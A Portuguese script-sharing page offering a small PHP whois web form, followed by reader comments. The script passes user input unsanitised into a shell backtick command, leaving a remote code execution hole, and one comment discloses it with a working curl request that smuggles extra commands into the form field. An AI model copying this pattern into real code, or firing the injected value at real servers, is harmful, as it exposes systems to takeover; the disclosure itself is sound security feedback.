Whois em PHP [PHP]

Whois em PHP

Publicado por Perfil removido (última atualização em 14/11/2012)

[ Hits: 7.491 ]

Download whoisphp.php

0 0

Denuncie Favoritos Indicar

Script simples em PHP para consulta whois.

Esconder código-fonte

<?php

/*
 * Scripit PHP para gerar whois 
 * 
 *  code by @Kouback_TR_
 *  http://koubacktr.com/
 *  http://twitter.com/kouback_tr_
 */
  
print"
<title>PHP-Kouback-Whois</title>
<body bgcolor=#000000>
<center><b><font size=6><font color=#FFFFFF>-=Whois=-</font></font></b></center>
<form method='post' action='?action=whois'>
<br>
<b><center><font color=#FFFFFF>Target whois</font></center></b>
<center><input type=text name=target></input></center></pre>
<center><input type=submit value='whois'></input></center>
<br><br><br><br>";

if($_GET['action'] == "whois"){
   
$target = $_POST['target'];
$whois = `whois $target && arp -a`;
print"
<CENTER><TABLE DIR=LTR WIDTH=50% BORDER=1 CELLPADDING=4 CELLSPACING=3><COL WIDTH=256*><TR><TD WIDTH=100% VALIGN=TOP><P><font color=#00FF14 size=2>";
echo nl2br($whois);
print"</P></TD></TR></TABLE></CENTER>";
}

?>

Scripts recomendados

Apache VirtualHosts Config

Babelfish Translator 2.0

PortScan em PHP com post usando fsockopen

PHP Script para testar ping de varios enderecoes em arquivo TXT

Script PHP para autenticacao web dos usuarios do proprio linux

Comentários

[1] Comentário enviado por fvox em 14/11/2012 - 10:06h

Hi.

Muito cuidado ao usar backticks pois é uma alias para a função shell_exec().
Seu código apresenta uma vulnerabilidade conhecida como RCE (Remote Code Execution).

Exploit:
:~$ curl -s "http://localhost/whois.php?action=whois" --data "target=whois fvox; id;uname -srmo #"
[...]
No whois server is known for this kind of object.<br />
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)<br />
Linux 2.6.xx-xx-generic x86_64 GNU/Linux<br />

0 0

[2] Comentário enviado por removido em 14/11/2012 - 19:27h

Obrigado amigo pela dica, e parabéns pela otima visão da falha, a internet precisa de mais gente como vc

0 0